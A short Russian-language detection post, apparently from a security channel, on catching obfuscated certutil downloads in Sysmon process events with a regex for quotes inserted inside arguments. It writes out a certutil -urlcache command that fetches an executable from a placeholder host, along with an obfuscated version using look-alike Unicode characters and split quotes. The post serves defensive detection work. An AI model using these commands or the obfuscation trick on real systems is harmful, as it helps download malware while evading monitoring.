Есть два примера из событий запуска процессов, первый не обфусцированный:
certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe
и второй обфусцированный:
CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe
Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)
Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов? 🧑💻
Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"
В нормальной ситуации кавычки используются в начале и конце строки, наример
certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группы#ttp@detectioneasy
#detection@detectioneasy